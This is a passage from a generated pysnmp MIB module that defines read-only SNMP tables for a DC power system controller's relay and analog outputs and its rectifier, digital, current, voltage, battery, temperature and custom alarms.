dcPwrSysRelayIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 1, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRelayIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRelayIndex.setDescription('The index of the relay variable in the power system controller relay output group.')
dcPwrSysRelayName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 1, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRelayName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRelayName.setDescription('The description of the relay variable as reported by the DC power system controller relay output group.')
dcPwrSysRelayIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRelayIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRelayIntegerValue.setDescription('The integer value of the relay variable as reported by the DC power system controller relay output group.')
dcPwrSysRelayStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 1, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRelayStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRelayStringValue.setDescription('The string value of the relay variable as reported by the DC power system controller relay output group.')
dcPwrSysRelaySeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 1, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRelaySeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRelaySeverity.setDescription('The integer value of relay severity level of the extra variable as reported by the DC power system controller relay output group.')
# ---- Analog output table (4.1.4.2) ----
# Same generated pattern: count scalar, table, indexed row, and read-only
# index/name/integer/string/severity columns.
dcPwrSysAnalogOpCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 2, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAnalogOpCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAnalogOpCount.setDescription('Number of analog output variables in system controller analog output table.')
dcPwrSysAnalogOpTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 2, 2), )
if mibBuilder.loadTexts: dcPwrSysAnalogOpTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAnalogOpTable.setDescription('A table of DC power system controller analog output variables.')
dcPwrSysAnalogOpEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 2, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysAnalogOpIndex"))
if mibBuilder.loadTexts: dcPwrSysAnalogOpEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAnalogOpEntry.setDescription('An entry into the DC power system controller analog output group.')
dcPwrSysAnalogOpIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 2, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAnalogOpIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAnalogOpIndex.setDescription('The index of the analog variable in the power system controller analog output group.')
dcPwrSysAnalogOpName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 2, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAnalogOpName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAnalogOpName.setDescription('The description of the analog variable as reported by the DC power system controller analog output group.')
dcPwrSysAnalogOpIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 2, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAnalogOpIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAnalogOpIntegerValue.setDescription('The integer value of the analog variable as reported by the DC power system controller analog output group.')
dcPwrSysAnalogOpStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 2, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAnalogOpStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAnalogOpStringValue.setDescription('The string value of the analog variable as reported by the DC power system controller analog output group.')
dcPwrSysAnalogOpSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 4, 2, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysAnalogOpSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysAnalogOpSeverity.setDescription('The integer value of analog severity level of the extra variable as reported by the DC power system controller analog output group.')
# ---- Rectifier alarm table (4.1.5.1) ----
# Generated alarm-table pattern: count scalar, table, indexed row, and
# read-only index/name/integer/string/severity columns.
dcPwrSysRectAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectAlrmCount.setDescription('Number of rectifier alarm variables in system controller alarm table.')
dcPwrSysRectAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 1, 2), )
if mibBuilder.loadTexts: dcPwrSysRectAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectAlrmTable.setDescription('A table of DC power system controller rectifier alarm variables.')
dcPwrSysRectAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 1, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysRectAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysRectAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectAlrmEntry.setDescription('An entry into the DC power system controller rectifier alarm group.')
dcPwrSysRectAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 1, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectAlrmIndex.setDescription('The index of the alarm variable in the DC power system controller table rectifier alarm group.')
dcPwrSysRectAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 1, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectAlrmName.setDescription('The description of the alarm variable as reported by the DC power system controller rectifier alarm group.')
dcPwrSysRectAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the DC power system controller rectifier alarm group.')
dcPwrSysRectAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 1, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectAlrmStringValue.setDescription('The string value of the alarm variable as reported by the DC power system controller rectifier alarm group.')
dcPwrSysRectAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 1, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysRectAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysRectAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the DC power system controller rectifier alarm group.')
# ---- Digital alarm table (4.1.5.2) ----
# Generated alarm-table pattern: count scalar, table, indexed row, and
# read-only index/name/integer/string/severity columns.
dcPwrSysDigAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 2, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigAlrmCount.setDescription('Number of digital alarm variables in system controller alarm table.')
dcPwrSysDigAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 2, 2), )
if mibBuilder.loadTexts: dcPwrSysDigAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigAlrmTable.setDescription('A table of DC power system controller digital alarm variables.')
dcPwrSysDigAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 2, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysDigAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysDigAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigAlrmEntry.setDescription('An entry into the DC power system controller digital alarm group.')
dcPwrSysDigAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 2, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigAlrmIndex.setDescription('The index of the alarm variable in the DC power system controller table digital alarm group.')
dcPwrSysDigAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 2, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigAlrmName.setDescription('The description of the alarm variable as reported by the DC power system controller digital alarm group.')
dcPwrSysDigAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 2, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the DC power system controller digital alarm group.')
dcPwrSysDigAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 2, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigAlrmStringValue.setDescription('The string value of the alarm variable as reported by the DC power system controller digital alarm group.')
dcPwrSysDigAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 2, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysDigAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysDigAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the DC power system controller digital alarm group.')
# ---- Current alarm table (4.1.5.3) ----
# Generated alarm-table pattern: count scalar, table, indexed row, and
# read-only index/name/integer/string/severity columns.
dcPwrSysCurrAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 3, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCurrAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCurrAlrmCount.setDescription('Number of current alarm variables in system controller alarm table.')
dcPwrSysCurrAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 3, 2), )
if mibBuilder.loadTexts: dcPwrSysCurrAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCurrAlrmTable.setDescription('A table of DC power system controller current alarm variables.')
dcPwrSysCurrAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 3, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysCurrAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysCurrAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCurrAlrmEntry.setDescription('An entry into the DC power system controller current alarm group.')
dcPwrSysCurrAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 3, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCurrAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCurrAlrmIndex.setDescription('The index of the alarm variable in the DC power system controller table current alarm group.')
dcPwrSysCurrAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 3, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCurrAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCurrAlrmName.setDescription('The description of the alarm variable as reported by the DC power system controller current alarm group.')
dcPwrSysCurrAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 3, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCurrAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCurrAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the DC power system controller current alarm group.')
dcPwrSysCurrAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 3, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCurrAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCurrAlrmStringValue.setDescription('The string value of the alarm variable as reported by the DC power system controller current alarm group.')
dcPwrSysCurrAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 3, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCurrAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCurrAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the DC power system controller current alarm group.')
# ---- Voltage alarm table (4.1.5.4) ----
# Generated alarm-table pattern: count scalar, table, indexed row, and
# read-only index/name/integer/string/severity columns.
dcPwrSysVoltAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 4, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysVoltAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysVoltAlrmCount.setDescription('Number of voltage alarm variables in system controller alarm table.')
dcPwrSysVoltAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 4, 2), )
if mibBuilder.loadTexts: dcPwrSysVoltAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysVoltAlrmTable.setDescription('A table of DC power system controller voltage alarm variables.')
dcPwrSysVoltAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 4, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysVoltAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysVoltAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysVoltAlrmEntry.setDescription('An entry into the DC power system controller voltage alarm group.')
dcPwrSysVoltAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 4, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysVoltAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysVoltAlrmIndex.setDescription('The index of the alarm variable in the DC power system controller table voltage alarm group.')
dcPwrSysVoltAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 4, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysVoltAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysVoltAlrmName.setDescription('The description of the alarm variable as reported by the DC power system controller voltage alarm group.')
dcPwrSysVoltAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 4, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysVoltAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysVoltAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the DC power system controller voltage alarm group.')
dcPwrSysVoltAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 4, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysVoltAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysVoltAlrmStringValue.setDescription('The string value of the alarm variable as reported by the DC power system controller voltage alarm group.')
dcPwrSysVoltAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 4, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysVoltAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysVoltAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the DC power system controller voltage alarm group.')
# ---- Battery alarm table (4.1.5.5) ----
# Generated alarm-table pattern: count scalar, table, indexed row, and
# read-only index/name/integer/string/severity columns.
dcPwrSysBattAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 5, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysBattAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysBattAlrmCount.setDescription('Number of battery alarm variables in system controller alarm table.')
dcPwrSysBattAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 5, 2), )
if mibBuilder.loadTexts: dcPwrSysBattAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysBattAlrmTable.setDescription('A table of DC power system controller battery alarm variables.')
dcPwrSysBattAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 5, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysBattAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysBattAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysBattAlrmEntry.setDescription('An entry into the DC power system controller battery alarm group.')
dcPwrSysBattAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 5, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysBattAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysBattAlrmIndex.setDescription('The index of the alarm variable in the DC power system controller table battery alarm group.')
dcPwrSysBattAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 5, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysBattAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysBattAlrmName.setDescription('The description of the alarm variable as reported by the DC power system controller battery alarm group.')
dcPwrSysBattAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 5, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysBattAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysBattAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the DC power system controller battery alarm group.')
dcPwrSysBattAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 5, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysBattAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysBattAlrmStringValue.setDescription('The string value of the alarm variable as reported by the DC power system controller battery alarm group.')
dcPwrSysBattAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 5, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysBattAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysBattAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the DC power system controller battery alarm group.')
dcPwrSysTempAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 6, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTempAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTempAlrmCount.setDescription('Number of temperature alarm variables in system controller alarm table.')
dcPwrSysTempAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 6, 2), )
if mibBuilder.loadTexts: dcPwrSysTempAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTempAlrmTable.setDescription('A table of DC power system controller temperature alarm variables.')
dcPwrSysTempAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 6, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysTempAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysTempAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTempAlrmEntry.setDescription('An entry into the DC power system controller temperature alarm group.')
dcPwrSysTempAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 6, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTempAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTempAlrmIndex.setDescription('The index of the alarm variable in the DC power system controller table temperature alarm group.')
dcPwrSysTempAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 6, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTempAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTempAlrmName.setDescription('The description of the alarm variable as reported by the DC power system controller temperature alarm group.')
dcPwrSysTempAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 6, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTempAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTempAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the DC power system controller temperature alarm group.')
dcPwrSysTempAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 6, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTempAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTempAlrmStringValue.setDescription('The string value of the alarm variable as reported by the DC power system controller temperature alarm group.')
dcPwrSysTempAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 6, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysTempAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysTempAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the DC power system controller temperature alarm group.')
dcPwrSysCustomAlrmCount = MibScalar((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 7, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomAlrmCount.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomAlrmCount.setDescription('Number of custom alarm variables in system controller alarm table.')
dcPwrSysCustomAlrmTable = MibTable((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 7, 2), )
if mibBuilder.loadTexts: dcPwrSysCustomAlrmTable.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomAlrmTable.setDescription('A table of DC power system controller custom alarm variables.')
dcPwrSysCustomAlrmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 7, 2, 1), ).setIndexNames((0, "AlphaPowerSystem-MIB", "dcPwrSysCustomAlrmIndex"))
if mibBuilder.loadTexts: dcPwrSysCustomAlrmEntry.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomAlrmEntry.setDescription('An entry into the DC power system controller custom alarm group.')
dcPwrSysCustomAlrmIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 7, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomAlrmIndex.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomAlrmIndex.setDescription('The index of the alarm variable in the DC power system controller table custom alarm group.')
dcPwrSysCustomAlrmName = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 7, 2, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 30))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomAlrmName.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomAlrmName.setDescription('The description of the alarm variable as reported by the DC power system controller custom alarm group.')
dcPwrSysCustomAlrmIntegerValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 7, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(-1000000000, 1000000000))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomAlrmIntegerValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomAlrmIntegerValue.setDescription('The integer value of the alarm variable as reported by the DC power system controller custom alarm group.')
dcPwrSysCustomAlrmStringValue = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 7, 2, 1, 4), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomAlrmStringValue.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomAlrmStringValue.setDescription('The string value of the alarm variable as reported by the DC power system controller custom alarm group.')
dcPwrSysCustomAlrmSeverity = MibTableColumn((1, 3, 6, 1, 4, 1, 7309, 4, 1, 5, 7, 2, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: dcPwrSysCustomAlrmSeverity.setStatus('current')
if mibBuilder.loadTexts: dcPwrSysCustomAlrmSeverity.setDescription('The integer value of alarm severity level of the extra variable as reported by the DC power system controller custom alarm group.')
